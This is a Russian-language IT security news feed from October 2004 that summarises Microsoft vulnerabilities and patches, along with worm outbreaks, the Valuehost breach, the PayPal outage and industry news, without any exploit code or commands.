Неутомимый Brett Moore из Security-Assessment.com продолжает радовать подробностями уязвимостей в Windows. На сей раз Бретт описывает метод атаки на ОС Windows с использованием API SetWindowLong()/SetWindowLongPtr(). Как описано в MSDN, SetWindowLong изменяет атрибуты соответствующего окна. Помимо этого, функция устанавливает 32-bit (long) значение смещения внутри экстра-памяти окна. С SendMessage() функцией любой пользователь может подменить данные, сохранённые в памяти применяемого окна. В резултате манипуляций с различными параметрами функции SetWindowLong() существует возможность загрузки собственного кода в известные области памяти с его дальнейшим выполнением. Самое примечательное, что M$ была извещена о подобной "особенности" ещё 5 февраля. Для устранения её рекомендуется применить патч, описанный в MS04-032. Уязвимость присутствует в: Windows 98, 98SE, ME, NT 4.0, 2000 Service Pack 4, XP, Microsoft Windows XP Service Pack 1, Windows Server 2003.
Описание в PDF-формате

15/10/2004 13:22 И ещё одна уязвимость в обработке JPEG в Microsoft
Итак, господа, "маппет-шоу" продолжается. Не успели M$ залатать дыру в одной библиотеке обработки изображений JPEG, как обнаружили новую. На сей раз уязвимость обнаружена в библиотеке asycpict.dll. Об этом сообщает John Bissell. Уязвимость якобы существует (вернее, проверена) в Windows XP (в том числе и SP2!), однако, как указывает автор, не исключено (и даже - скорее всего вероятно) во всех версиях после Win 3.1 (думается, немногие из посетителей нашего сайта видели живьём эту версию ;)). Последствия довольно серьёзные - полное исчерпание ресурсов машины с дальнейшей перезагрузкой. Как ни печально, на настоящий момент патчей для уязвимости не существует. Атака может быть выполнена удалённо - например, при просмотре Вэб-сайта, либо при просмотре почтового сообщения. Автор приводит пример эксплоита. Подробности уязвимости приведены ниже.
Описание

15/10/2004 13:03 В США разрешен высоковольтный интернет
Федеральная комиссия электросвязи (FCC) одобрила технологию передачи данных по высоковольтным линиям электропередач. 14 сентября члены FCC единогласно одобрили список правил предоставления услуг высокоскоростного доступа в интернет посредством ЛЭП. Таким образом, в ближайшее время на рынке массового доступа в Сеть должна появиться заветная третья сила, которая даст FCC право торжественно умыть руки и заявить, что отрасль больше не нуждается в специальном государственном регулировании. Выступая на пресс-конференции, устроенной специально по этому поводу, председатель FCC Майкл Пауэлл (Michael Powell) заявил, что благодаря практически повсеместному распространению линий электропередач по территории США, в стране, наконец, появилась "идеальная платформа" для создания по-настоящему массовой сети недорогого, и вместе с тем – быстрого, интернет-доступа. По мнению г-на Пауэлла, которое цитирует TelephonyOnline.com, появление третьего вида доступа сделает рынок домашнего скоростного доступа действительно конкурентным, что приведет к существенному падению цен.
Internet.Ru

15/10/2004 12:12 OpenBSD отпраздновала 9-летие.
Официальной датой старта проекта OpenBSD считается 16:36 MST 14 октября 1995 года (03:36 15 октября по Московскому времени), когда OpenBSD была сформирована на базе дерева NetBSD, сообщает linux.org.ru. Главными целями новой ОС стали безопасность и переносимость кода.
Подробности

15/10/2004 11:39 Microsoft может поплатиться за «Автозапуск»
В ходе патентного спора относительно функции «Автозапуск», встроенной во все последние версии Windows, федеральный судья вынес решение не в пользу компании Microsoft. Судья Северного округа штата Калифорния Джефри Уайт (Jeffrey White) отклонил три ходатайства юристов Microsoft о рассмотрении дела в порядке упрощенного судопроизводства. Патентная тяжба началась с подачи компании TV Interactive Data (TVI), настаивающей, что функция «автозапуск», появившаяся в операционных системах Microsoft начиная с Windows 95, нарушает ряд её патентов. В каждом из трех ходатайств Microsoft призывала судью лишить патенты TVI силы. Судья Уайт отклонил ходатайства, мотивируя свое решение тем, что Microsoft не предоставила достаточных доказательств необходимости признать патенты недействительными. Согласно процедуре, дело теперь перейдет на рассмотрение в суд. Компания TVI, специализирующаяся на рынке интерактивного ТВ, подала заявление в суд в мае 2002 года, заявляя, что Microsoft, включив функцию «автозапуск» приложений в свои продукты, нарушила тем самым американские патенты TVI за номерами 5,795,156 и 6,249,863, выданные основателям компании Питеру Редфорду (Peter Redford) и Дональду Штерну (Donald Stern). Функция «автозапуск» подразумевает сканирование носителя данных и автоматическое выполнение, к примеру, программы установки приложения. Патенты TVI описывают «устройство, с возможностью запуска какого-либо процесса при подключении носителя с информацией» и «драйвер устройства, отслеживающий подключение носителей данных и автоматически запускающий установочную программу». Юристы Microsoft утверждают, что патенты TVI описывают аппаратно зависимую технологию, а так как ОС Windows таковой не является, она не может напрямую нарушать указанные патенты. Ходатайства также поясняют, что Microsoft не могла специально нарушить данные патенты, так как нет доказательств того, что Microsoft знала об их существовании до начала судебного разбирательства. Контраргументом TVI является утверждение, что ссылка на её первый патент имеется в патентах Microsoft. Слушание по этому ходатайству намечено на 17 декабря 2004 года.
CNews

15/10/2004 10:12 Корейская полиция задержала самого опасного хакера страны
Центр противостояния кибертерроризму при Национальном полицейском агентстве Республики Корея задержал 30-летнего мужчину по фамилии Ли. Задержанный - бывший сотрудник компании, занимающейся обеспечением информационной безопасности, - считается самым опасным южнокорейским хакером, сообщает сайт газеты Chosun. Специалисты Центра противостояния кибертерроризму подозревают Ли во взломе 1152 сайтов и локальных компьютерных сетей. Это самое крупное число киберпреступлений, совершенных в Республике Корея одним человеком. Все указанные преступления были совершены с марта 2003 года. По данным следствия, Ли уволился из своей компании в 2002 году и увлекся взломом компьютеров и коллекционированием порноматериалов. Одна из первых троянских программ Ли была встроена в фотографию, которую он отправил по почте своей виртуальной приятельнице. Полицейские полагают, что Ли не только собирал чужую информацию, но и продавал ее третьим лицам. В числе объектов, атакованных Ли: Сеульский национальный университет и Корейский институт передовой науки и технологии.
Viruslab

15/10/2004 09:44 Уязвимость в Microsoft Excel
Ранее мы сообщали, что в пачке выпущенных M$ патчей один закрывает брешь в популярном ПО работы с электронными таблицами Excel (MS04-033). Brett Moore из компании Security-Assessment.com сообщает о подробностях уязвимости, обнаруженной 17 июля сего года (о чём было сообщено тут же Microsoft). При тестировании программы SA-FileFoxyFuxoryFinder была обнаружена странная "особенность" Excel при обработке файла. При чтении этого файла и интерпретации одного из значений в качестве параметра при копировании строки, возможно получение типичной ситуации переполнения буфера в стеке, если параметр принимает большое значение. При этом просиходит перехват управления указателем EIP и другими важными регистрами. При выполнении примера атаки авторами наблюдалась следующая строка в логе событий: "Application popup: EXCEL.EXE - Application Error : The exception Privileged instruction. (0xc0000096) occurred in the application at location 0x########. Возможно удалённое прведение атаки при использовании тэга "IFRAME". Уязвимость присутствует в Office 2000 Service Pack 3, Office XP, Office 2001 for Mac, Office v. X for Mac.
Описание в PDF-формате

15/10/2004 09:33 Уязвимость в libtiff
Chris Evans сообщает об уязвимости в программе обработки (кодирование/декодирование) TIFF-файлов в открытых системах - libtiff, которая применяется во многих *NIX-системах. Как следует из приведённого анализа, ошибки обнаружены в коде обработки RLE в файлах tif_next.c, tif_thunder.c, tif_luv.c. Эти ошибки могут привести к переполнению буфера и, как следствие, компрометации пользователя, который запустит специально оформленный файл. Автор приводит примеры подобных TIFF-файлов.
Описание

15/10/2004 09:30 У Microsoft украли новую игру
В интернете распространяют нелегальные копии игры Halo 2, которая разработана студией Bungie, принадлежащей компании Microsoft. Они появились на пиратских сайтах и в группах новостей примерно за месяц до официального релиза игры, назначенного на 9 ноября, сообщается на сайте BBC News. Как говорится в заявлении Microsoft, скачивание игры и предоставление доступа к ней является воровством. Компания очень серьезно относится к защите прав на интеллектуальную собственность и вместе с компетентными органами пытается выяснить, как произошла утечка. Ожидается, что Halo 2, предназначенная для приставки Xbox, станет одной из самых популярных игр этого года. Первая часть под названием Halo: Combat Evolved вышла в 2001 году. С тех пор по всему миру было продано около четрыех миллионов ее копий. По словам экспертов, появление Halo 2 в интернете вряд ли скажется на объемах продаж игры, поскольку Microsoft удалось быстро закрыть доступ к пиратским копиям. Кроме того, для установки нелегальных копий необходимо взломать защиту Xbox, но даже в этом случае пользователи не смогут играть в Halo 2 по сети.
Lenta.Ru

14/10/2004 14:00 Valuehost взломали с полпинка
Несколько месяцев назад на хакерских форумах появились объявления о продаже базы данных хостинг-компании Valuehost. В частности, в одном из объявлений было анонсировано, что база содержит реквизиты доступа (логин/пароль) к 50 000 сайтам, размещенных у этого провайдера. А 6 октября на сайте журнала Xakep появилось полное описание того, как хакерам удалось проникнуть на сервера Valuehost и утащить оттуда эту жизненно важную информацию. Как это описывает автор статьи, украсть базу данных оказалось не просто, а очень просто. Дыра в безопасности Valuehost была проделана не стараниями программистов Microsoft, а кривыми руками самих администраторов хостинг-компании. Вот последовательность из нескольких ошибок, которые позволили хакерам взломать хостера:
1. На сайте был установлен форум UBB, разработанный по технологии open source. Исходники этого форума можно с легкостью достать и изучить на наличие дыр в безопасности. Обычно такие «бесплатные» форумы устанавливают на частные проекты, не представляющие для хакеров особой ценности. Фирмы же покрупнее (каковой, вероятно, считает себя Valuehost) озабочиваются разработкой собственных форумов. Они, естественно, тоже не застрахованы от ошибок, но на поиски этих ошибок хакер может потратить довольно долгое время, что, вполне вероятно, сведет на нет его желание хакнуть такую предусмотрительную компанию.
2. Некоторые директории (в частности, /images/icons/ и /stylesheets/) были открыты для записи, через эту дырочку были «залиты» хакерские инструменты, которые расширили ее до размеров пещеры, по которой можно легко и свободно вывозить информацию грузовиками.
3. Администраторы использовали крайне простые пароли. Так, автор статьи упоминает распространенный пароль 1234567890, содержащийся в любых «перебиралках» паролей в числе первых.
4. Администраторы Valuehost не отслеживали защищенность своей системы, что позволило хакерам пользоваться ею в течение полугода. Правда, после полгода эта дыра была все-таки заделана, но заделана без фантазии: еще одна точно такая же дырка осталась не закрытой, и хакеры еще долгое время спокойно продолжали пользоваться «услугами» Valuehost по предоставлению доступа для дефейса своих сайтов.
Вебпланета

14/10/2004 13:36 Adobe выпустила "любительскую" версию Photoshop
В минувшую среду компания Adobe Systems выпустила третью версию пакета Photoshop Elements, предназначенного для владельцев цифровых фотокамер и художников-любителей. Как сообщает CNET, Photoshop Elements 3.0 отличается улучшенным набором инструментов для ретуширования фотографий, включая так называемую "восстанавливающую кисть" (healing brush), пользующуюся большим успехом среди пользователей программы. Помимо прочих улучшений создатели пакета не забыли включить в интерфейс Elements 3.0 ссылки на сетевые принт-сервисы, созданные в сотрудничестве с компанией Kodak Ofoto. Полная версия Photoshop Elements 3.0 для Windows XP обойдется покупателям всего в 100 долларов (да-да, на рынке можно купить "паленый" диск за сто рублей, но мы говорим о легальных версиях, правильно?), а апгрейд – в 80 у.е. Для владельцев компьютеров Apple, работающих под управлением Mac OS X, сделана скидка: они смогут купить программу за девяносто или семьдесят долларов соответственно. Пакет, в состав которого входит Photoshop Elements и Premiere Elements, можно взять за 150 долларов.
Internet.Ru

14/10/2004 13:10 "Лаборатория Касперского" открыла бета-тестирование "Антивируса 5.5" для ISA 2000
«Лаборатория Касперского» открывает бета-тестирование «Антивируса Касперского 5.5» для Microsoft ISA Server 2000 Enterprise Edition. Антивирус Касперского 5.5 для Microsoft ISA Server 2000 Enterprise Edition предназначен для защиты крупных корпоративных сетей и устанавливается на массивах серверов ISA Server 2000 Enterprise Edition. Разработка обеспечивает централизацию административной части системы, а именно поддержку общей конфигурации для всех серверов, входящих в массив, а также процедуру централизованного обновления антивирусных баз данных. Антивирус Касперского 5.5 для Microsoft ISA Server 2000 Enterprise Edition представляет собой систему антивирусного контроля над файлами, передаваемыми по протоколам HTTP и FTP через межсетевой экран Microsoft Internet Security and Acceleration Server 2000 Enterprise Edition. Программа выполняет функцию фильтра, который перехватывает данные, передаваемые по протоколам HTTP и FTP с целью выделения контролируемых объектов и их последующего анализа на присутствие вредоносного кода. В случае обнаружения вредоносного кода система блокирует его дальнейшую передачу. Антивирус Касперского 5.5 для Microsoft ISA Server 2000 Enterprise Edition обладает набором пользовательских функций. Интерфейс полностью интегрирован со специализированным интерфейсом Microsoft Management Console. Возможно создание графика автоматического обновления антивирусных баз через интернет (с периодом до одного часа), либо осуществление обновления в ручном режиме.
"Лаборатория Касперского"

14/10/2004 12:34 Уязвимость в VDM Windows
И ещё одна уязвимость в Windows описана всё той же eEye Digital Security. На сей раз она присутствует в механизме ядра NT-базирующихся ОС при выполнении 16-битного кода с применением VDM - виртуальной машины DOS (NTVDM.EXE). В результате проведения атаки локально могут быть повышены привилегии до максимально возможных в системе - привилегий ядра. Уязвимость присутствует в ОС - Windows NT 4.0, Windows 2000, Windows XP (SP1 и раньше), Windows Server 2003. Уязвимость описана довольно подробно - на уровне адресов и функций и даёт много простора для пытливого ума ;). Что примечательно, как пишут авторы уязвимости, дыра была прикрыта ещё в июне в SP2 Release Candidate 2, однако другие ОС остались M$ беззащитными до настоящего момента. Патч доступен в MS04-032.
Подробное описание

14/10/2004 12:02 Уязвимость Windows при обработке ZIP-файлов
Череда разоблачений Windows продолжается. На сей раз отметилась известная компания eEye Digital Security в лице Derek Soeder, который опбликовал подробности уязвимости в Windows при обработке ZIP-файлов в оболочке Windows. Ошибка в модуле DUNZIP32.DLL, который позволяет просматривать ZIP-файлы в оболочке Windows, позволяет вызвать целочисленное переполнение буфера в стеке с пререзаписью перключателя исключений (exception handler) и возможной подменой EIP. В дальнейшем. естественно, возможна передача управления на специальным образом созданную программу. Для вызова подобного переполнения необходимо внутри ZIP-файла создать файл с очень длиннным именем (больше 0x8000 байт). Уязвимы - WinXP SP1, Win ME. Для устранения уязвимости - MS04-034. Последствия уязвимости могут быть использованы, например, теми же вездесущими троянами.
Описание

14/10/2004 11:39 Описание уязвимости в механизме SSL Internet Explorer
Об ещё одной из уязвимостей в IE сообщает ACROS Security. Из-за ошибки работы браузера с механизмом сертификатов SSL возникает возможность обойти защиту проверки подлинности сертификата SSL и убедить пользователя в том, что сертификат подлинный. В результате возникает возможность внедрения в кеш браузера специальным образом оформленных фальшивых документов (HML, графических файлов, файлов скриптов (.js), файлов таблиц (.css), других статических документов), которые затем могут быть использованы при посещении легитимных сайтов путём извлечения из кеша и предоставления в качестве страницы посещаемого сайта. Cказанное выше справидливо для HTTPS-сайтов, посещение которых обычно связано с работой с важной критичной информацией (номера крдитных карточек, сертификаты, например и т.д.). Последствия такой уязвимости очевидны. Уязвимость присутствует во всех версиях IE, в которых не установлен недавно вышедший кумулятивный патч 834707 (MS04-038). В выпущенном описании даются рекомендации по временной нейтрализации уязвимости в браузере - включить опцию "Do not save encrypted pages to disk". Также выданы рекомендации для различных Вэб-серверов - игнорировать заголовок браузера "If-Modified-Since".
Подробное описание

14/10/2004 11:16 Он-лайн казино на "крючке" у хакеров
Английские эксперты в области компьютерной безопасности сообщают о том, что количество игорных сайтов, атакуемых кибер-преступниками, неуклонно растет. Их число трудно определить в связи с тем, что многие компании просто отказываются информировать об этих атаках широкую общественность, опасаясь повредить репутацию корпорации. По данным аналитиков, отслеживающих эту ситуацию в Великобритании, нет ни одного игорного портала, ни разу не платившего хакерам. На недавней конференции по проблемам уязвимости интерактивного игорного дела еще раз отмечалось, что средний размер выкупа, требуемого хакерами, составляет 40 000$, самая привычная схема атаки - отказ в обслуживании клиентов в результате затопления трафика большим количеством пакетов. На конференции представители различных агентств по защите информации обратились к разработчикам ПО и создателям систем безопасности для игорных сайтов с предложением сменить политику в этой сфере деятельности - поощрять новые разработки, стимулировать новые идеи, пусть даже самые необычные и т.д. На встрече представителей он-лайн казино специально попросили сообщать о всех сбоях в сиcтеме из-за вмешательства хакеров, чтобы процесс стал более прозрачным и потому более контролируемым.
Crime-Research

14/10/2004 11:14 Грандиозный сбой в работе платежной системы PayPal
В работе одной из самых крупных платежных систем в интернете PayPal произошел грандиозный сбой. Сотни тысяч пользователей в течение пяти дней не могли осуществлять денежный транзакции, а сайт PayPal на какое-то время оказался полностью недоступен. События развивались следующим образом. По информации представителей PayPal, первые проблемы возникли в пятницу, после того как было проведено плановое обновление программного кода системы электронных платежей. В течение нескольких часов после инсталляции апдейтов все шло нормально, однако затем сотни тысяч пользователей PayPal наткнулись на невозможность оплаты товаров и услуг со своих счетов, а также приёма средств. Торги на онлайновом аукционе eBay, использующем PayPal в качестве основной платежной платформы, также были нарушены, аналогичная участь постигла и множество других сайтов, так или иначе связанных с вышеназванной системой. В субботу и воскресенье ситуация несколько стабилизировалась, однако последующие два дня принесли новые неприятности. Как теперь передает Reuters, в среду системным администраторам PayPal наконец удалось справиться с проблемой, тем не менее, работа платежной системы по-прежнему остается нестабильной. Представители компании отказались уточнить, что именно произошло, заметив лишь, что откат к ранее использовавшемуся программному обеспечению сделать было практически невозможно. Некоторые независимые обозреватели полагают, что сбой связан вовсе не с обновлением ПО. По их мнению, PayPal подверглась массированной DoS-атаке. В пользу данной гипотезы говорят данные, собранные компанией Netcraft. Дело в том, что буквально за несколько дней похожие затруднения возникли у другой известной платёжной системы WorldPay, а еще раньше у нескольких менее крупных сервисов. Таким образом, можно предположить, что следующие один за другим сбои в платежных системах вряд ли являются случайностью.
"Компьюлента"

14/10/2004 10:41 Netscape: согнут, но не сломлен
В среду браузеру Netscape исполнилось 10 лет. Тень его прошлого заслоняет то, что от него осталось сегодня, однако огонь одного из самых памятных брендов в истории веба еще не совсем угас. Как стало известно CNET News.com, America Online, которая долгие годы мусолит свое дорогостоящее приобретение, вновь готовит возрождение Netscape. Этот шаг вызывает удивление, учитывая, что менее года назад компания уволила сотни программистов Netscape и, как сообщалось, разрабатывает самостоятельный браузер на базе конкурирующей технологии Internet Explorer. Тем не менее, источники, знакомые с планами компании, говорят, что отделение Time Warner наносит последние штрихи на новые версии браузера и веб-портала Netscape. Компания планирует представить их вместе с новой маркетинговой стратегией в декабре или январе. AOL отказалась рассказать о новых возможностях Netscape, но источники говорят, что это не тот браузер, который разрабатывается на базе IE и тоже находится в работе. AOL хранит молчание и о портале вместе с маркетинговой инициативой, пообещав только, что продукт выйдет к Новому году. Хотя Netscape дала жизнь основному проекту разработки браузера open-source, Mozilla, AOL пока не извлекла никаких выгод от недавних успехов этой группы. Предварительные версии Mozilla и Firefox получают одобрительные отзывы, но AOL продолжает использовать IE в качестве браузера по умолчанию для своей проприетарной онлайновой службы и в качестве основы для планируемого автономного браузера. В последние месяцы AOL слабо продвигала Netscape 7, основанный на версиях Mozilla, предшествующих Firefox, и в последний раз обновленный в августе.
ZDNet

14/10/2004 10:21 Сравнение различных отрытых VPN решений.
В рамках проекта VOLANS, Shashank Khanvilkar из Чикагского университета штата Иллинойс опубликовал таблицу "Comparison Chart of Different VPN solutions", в которой представлено отличное сравнение характеристик существующих Open Source VPN решений для Linux. В таблице рассмотрены такие параметры как тип туннелинга, методы шифрования, аутентификации и сжатия, производительность, масштабируемость и популярность решения. Кроме того, для каждого из рассматриваемых продуктов, приведена краткая инструкция по настройке и установке (ссылка по символу "X" во второй строке). Возможно, таблица поможет кому-нибудь из посетителей нашего сайта определиться с выбором решения при построении VPN. О существовании таблицы сообщил сайт www.opennet.ru (за что ему очередное спасибо :)).
Таблица

14/10/2004 10:04 Описание уязвимости в Windows NT
После выхода обновлений от Microsoft начинают появляться подробности уязвимостей, которые латаются вышедшими бюллетенями. BindView опубликовала подробности уязвимости в Windows NT (лечится патчем, описанным в MS 04-029). Уязвимость свзанна с некооректной обработке поступающих запросов RPC-сервером, в частности, из-за переполнения в rpc__mgmt_inq_stats существует возможность получения большого объёма адресного пространства сервера, а также вызвать отказ самого сервера, запросив большой объём информации в RPC-запросе. Самое печальное, что это может быть вызвано удалённо (в силу самой природы механизма RPC). В разряд попало большое количество серверов, обслуживающих RPC-запросы, среди которых: SAM, LSA, любые RPC-сервисы, сервис Server, любые приложения, использующие RPC (Exchange и SQL, например). Как было сказано выше, атакующий может получать доступ к большому объёму системной памяти, что может привести к утечке важной системной информации. В экспериментах с уязвимостью BindView против LSA и домен-контроллеров был получен хеш пароля администратора сервера. Согласно собственной политике, BindView в течении 30 дней отказывается разглашать подробности уязвимости.
SecurityFocus

13/10/2004 20:28 Red Hat будет использовать технологии от Netscape
Компания Red Hat объявила о своем намерении использовать в корпоративной версии своей операционной системы некоторые решения от Netscape. Red Hat интересует набор программ под общим названием Netscape Security Solutions. Directory Server, к примеру, поможет Red Hat собрать все настройки, связанные со свойствами приложений, профилями пользователей, политиками и правами доступа в единый реестр, который будет доступен в том числе и по сети. Также Red Hat будет использовать Certificate Management System для идентификации пользователей по цифровым сертификатам.
"Компьюлента"

13/10/2004 12:14 Интеграция мэйнфреймов в SOA
Специалисты компании Attachmate анонсировали Synapta Presentation Builder и Services Builder - программные системы, создающие уровень абстрагирования обрабатываемых мэйнфреймами данных в целях обеспечения возможности использования их в современных приложениях. Как заявляют в Attachmate, ее инструментарий позволит интегрировать приложения для мэйнфреймов в сервисно-ориентированные архитектуры, связывая их с системами бизнес-логики при помощи сред разработки наподобие Visual Studio .Net. Интеграция осуществляется посредством визуальных средств, позволяющих сделать доступными для внешних систем данные, выводимые (в том числе на экран) приложениями для мэйнфреймов. По словам представителя Attachmate, в результате мэйнфрейм "фактически превращается для внешнего приложения в СУБД, которую можно опрашивать при помощи SQL-запросов".
"Открытые системы"

13/10/2004 11:42 Об одной из уязвимостей в Internet Explorer
Вслед за Core Security Technologies подробности об одной из уязвимостей в браузере IE опубликовала известная секьюрити компания NGSSoftware опубликовала информацию об одной из многих уязвимостей, обнаруженных в Internet Explorer. Уязвимость присутствует в механизме движка инсталляции (Install Engine control - в оригинале). Подробности уязвимости компания в данный момент не раскрывает, следуя своей недавно объявленной политике задержки деталей уязвимостей в 3 месяца (детали, согласно бюллетеня, будут опубликованы 19 января 2005 г.). Уязвимость обнаружил один из сотрудников компании Peter Winter-Smith, присутствует она в версиях Microsoft Internet Explorer 5.x, 6.х. Устраняется кумулятивным патчем MS04-038, выпущенным вчера. Судя же по информации в этом бюллетене, речь идёт об уязвимости динамической библиотеки Inseng.dll, наличие которой позволяет выполнить удалённому атакующему произвольный код в системе. Также хотелось бы отметить, что всего кумулятивный патч в MS04-038 закрывает 8 уязвимостей IE, среди которых уязвимости в таких компонентах: CSS Heap Memory Corruption Vulnerability, Similar Method Name Redirection Cross Domain Vulnerability, Drag and Drop Vulnerability, Address Bar Spoofing on Double Byte Character Set Systems Vulnerability, Plug-in Navigation Address Bar Spoofing Vulnerability, Script in Image Tag File Download Vulnerability, SSL Caching Vulnerability. Обилием подобных дыр (а есть ещё около десятка неустранённых, которые аккуратно отслеживает исследователь безопасности http-equiv) M$ всё более склоняет здравомыслящих пользователей использовать альтернативные браузеры.
Подробности

13/10/2004 11:38 Новый червь угрожает пользователям Windows Messenger
Компания Symantec обнаружила новую вредоносную программу, получившую название Funner, сообщает "Компьюлента". После активации этот червь записывает на жесткий диск компьютера несколько своих копий с именами iexplore.exe, explore.exe, rundll32.exe, userinit32.exe, funny.exe и регистрируется в ключе автозапуска системного реестра. Далее Funner пытается разослать себя по всем адресам, найденным в книге контактов интернет-пейджера Windows Messenger. Кроме того, в ряде случаев вредоносная программа соединяется с сайтом 78p.com и загружает с него дополнительные компоненты. Червь Funner охарактеризован специалистами Symantec как умеренно опасный.
Описание червя

13/10/2004 10:49 Новый вариант червя Opasoft
Лаборатория Касперского" отмечает значительный рост числа обращений от российских пользователей относительно нового варианта сетевого червя Opasoft.s. Червь распространяется по локальным сетям, используя открытые сетевые ресурсы. Данный вариант был обнаружен 7 октября 2004 года и в тот же день было выпущено обновление антивирусных баз для детектирования Worm.Win32.Opasoft.s.
Описание червя

13/10/2004 10:27 Оптические сети: новое поколение
Для демонстрации новых возможностей технологии оптических сетей создается испытательный полигон, где будут проводиться исследования, способные вновь разжечь огонь под умирающей отраслью. Проект National LambdaRail (NLR) предусматривает соединение университетов по всем Соединенным Штатам полностью оптической сетью, состоящей из тысяч миль оптоволокна; это будет первая сеть подобного рода. Цели исследований NLR — и потенциальное значение этого проекта для коммерческого рынка — таковы, что некоторые эксперты проводят параллель между ним и теми ранними разработками, которые в свое время привели к созданию самого интернета. В прошлом месяце закончился первый этап внедрения очереди NLR «Восток-Запад», соединившей Денвер с Чикаго, Атланту с Джексонвиллем и Сиэттл с Денвером. Второй этап, который должен завершиться в мае или июне 2005 года, охватит юг Соединенных Штатов. Эта часть проекта свяжет университеты Луизианы, Техаса, Оклахомы, Нью-Мексико, Аризоны, Солт-Лейк-Сити и Нью-Йорка. Забудьте об Internet2 с его сетью Abilene с пропускной способностью 10 Гбит/с. Эксперты утверждают, что NLR — это самая амбициозная сетевая инициатива с тех самых пор, как Министерство обороны США в 1969 году организовало ARPAnet, а Национальный фонд науки работал в конце 80-ых годов над NSFnet — два эти проекта считаются главными факторами, которые привели к созданию и коммерциализации интернета. Как и Abilene, NLR в большой степени опирается на Internet2, научное объединение университетов, нацеленное на создание сетевых технологий нового поколения. Но NRL предлагает нечто, чего недостает родственному проекту — полную оптоволоконную инфраструктуру, на которой ученые смогут строить свои собственные IP-сети. Abilene же предоставляет IP-каналы, проложенные по инфраструктуре, которая арендуется у коммерческих операторов базовой сети, а это существенно ограничивает возможности исследований.
О проекте

13/10/2004 09:58 Дума отклонила закон о спаме
Профильный комитет Госдумы рекомендовал отклонить внесенный Мосгордумой законопроект о борьбе со спамом. Депутаты считают, что проблема спама "гораздо шире представленной в законопроекте". О решении профильного комитета по информационной политике объявил на брифинге в понедельник его председатель - Валерий Комиссаров. комитет рассмотрел представленный московской городской думой проект закона «О внесении дополнений в некоторые законодательные акты РФ в части противодействия массовой рассылке сообщений электросвязи рекламного характера». "Ввиду глобализации Интернета массовая рассылка сообщений может осуществляться с компьютеров, находящихся на территории иностранных государств, в связи с чем в законопроекте необходимо предусмотреть международное сотрудничество в борьбе со спамом», – цитирует слова Комиссарова РИА "Новости".
РИА "Новости"

13/10/2004 09:29 Уязвимость в сервисе NNTP IIS
О наличии второй уязвимости (и тоже в IIS) сообщают исследователи Lucas Lavarello и Juliano Rizzo из компании Core Security Technologies. На этот раз уязвимость обнаружена в сервисе NNTP, который осуществляется в IIS. NNTP - Network News Transfer Protocol (RFC 977) - протокол, предназначенный для организации и управления системой обмена новостями. В IIS (да и влюбом другом NNTP-сервере) протокол использует порт 119/tcp, либо 563/tcp, если используется SSL. Уязвимость обнаружена в обработке одного из расширений протокола NNTP - команды XPAT, которая испольуется для получения заголовков новостей на основе используемых шаблонов. Природа уязвимости связана с некорректной проверкой границ выделяемого буфера, выход за которую может позволить как локальному, так и удалённому атакующему выполнить произвольную команду на сервере в контексте пользователя, от имени которого запущен сервер. Выпущен демонстрационный код и вариант эксплоита. Уязвимости подвержены - NT Server 4.0 Service Pack 6a NNTP component, 2000 Server Service Pack 3 NNTP component, 2000 Server Service Pack 4 NNTP component, 2003 NNTP Component, 2003 64-Bit Edition NNTP Component. Для устранения уязвимости рекомендуется обновиться, согласно MS04-036, либо отключить использование NNTP.
Описание

13/10/2004 09:19 Уязвимость в IIS
Как и следовало ожидать, начали публиковаться подробности уязвимостей в продуктах Microsoft. Amit Klein опубликовал информацию об уязвимости в популярном продукте Microsoft IIS, повсеместно используемом на Windows-серверах. Она пристутствует в WebDAV - компоненте IIS при разборе XML-атрибутов. Для проведения атаки нападающий должен сформировать специальный WebDAV PROPFIND - запрос, в котором присутствуют специальные XML-атрибуты, обработка которых вызывает DoS сервера. Подобная ситуация вызвана ошибкой в XML-парсере, которая вызывает полное исчерпание ресурсов сервера со 100% загрузкой процессора на длительный период времени (в зависимости от масштабов атаки и нагрузки сервера - от нескольких секунд до нескольких минут). Для исправления уязвимости рекомендуется обновиться, обратившись к MS04-030. Уязвимости подвержены Microsoft IIS/5.0 (Windows/2000), Microsoft IIS/5.1 (Windows XP), Microsoft IIS/6.0 (Windows/2003).
MS04-030

13/10/2004 09:06 Серия обновлений от Microsoft
Microsoft в очередной раз "обрадовала" пользователей своих операционных систем выходом целой пачки обновлений, выпустив октябрьскую серию заплаток вчера. На этот раз количество обновлений просто впечатляет - 10 (!) штук. Причём 7 из них носят критический характер, а 3 - важный (important). Уязвимости оказались подвергнуты практически все версии выпускаемых ОС (пожалуй, не упоминается только Windows 95 и Windows 3.11 ;)). Итак выпущены бююлетени по безопасности с MS03-029 по MS04-038 (заметьте - за прошедшие 9 месяцев выпущены 28 бюлетеней). Подобный "стахановский" подход можно объяснить либо абсолютной дырявостью "ОС для домохозяек", либо наконец-то изменившимся подходом M$ к обнаружению уязвимостей в своих ОС. Вот только уязвимости (как показывает практика) почему-то обнаруживаются сторонними компаниями (той же NGSSoftware, например). Итак, по порядку. Критические обновления:
- обновление для Windows, включающее исправление удаленного исполнения кода, двух способов повышения привилегий и одну потенциальную DoS-атаку.
- исправление удаленного исполнения кода в Excel.
- исправление ошибки в обработке сжатых папок, приводящей к удаленному исполнению кода.
- исправление SMTP-компонента и Exchange Server Routing Engine, допускающих удаленное исполнение кода.
- устранение аналогичной проблемы в NNTP-компоненте.
- исправление ошибок в Windows Shell (в процедуре запуска приложений и конверторе программных групп), приводящих опять-таки к удаленному исполнению кода.
- кумулятивное обновление для IE, исправляющее 5 ошибок, приводящих к удаленному исполнению кода и 3 - к утечке информации.
Исправления со статусом важных:
- утечка информации и DoS из-за уязвимости в RPC Runtime Library.
- DoS в WebDav XML Message Handler.
- удаленное исполнение кода с помощью уязвимости в службе NetDDE.
Радует то, что Windows XP SP2 упоминается только в одном обновлении - MS04-038, котрое касается кумулятивного обновления в браузере IE. Теперь остаётся ждать подробных описаний от авторов обнаруженных уязвимостей.
Октябрьские обновления от M$

12/10/2004 13:28 Макровирус Kamal прячется в документах Microsoft Word
Компания Symantec зафиксировала появление нового макровируса, инфицирующего документы Microsoft Word, cообщает "Компьюлента". После активации вредоносная программа, получившая название Kamal, выполняет несколько основных действий. Во-первых, Kamal выводит на дисплей информационное сообщение, содержащее символ "I". Во-вторых, вредоносная программа внедряется в шаблон Normal.dot и отключает антивирусную защиту вышеназванного текстового редактора. Наконец, в-третьих, Kamal изменяет свойства открываемых документов, добавляя в поля "Автор" и "Тема" строку "I-Worm.Kamila", а в поле "Заметки" - текст "Generated by I-Worm.Kamila". Широкого распространения макровирус Kamal пока не получил.
Описание

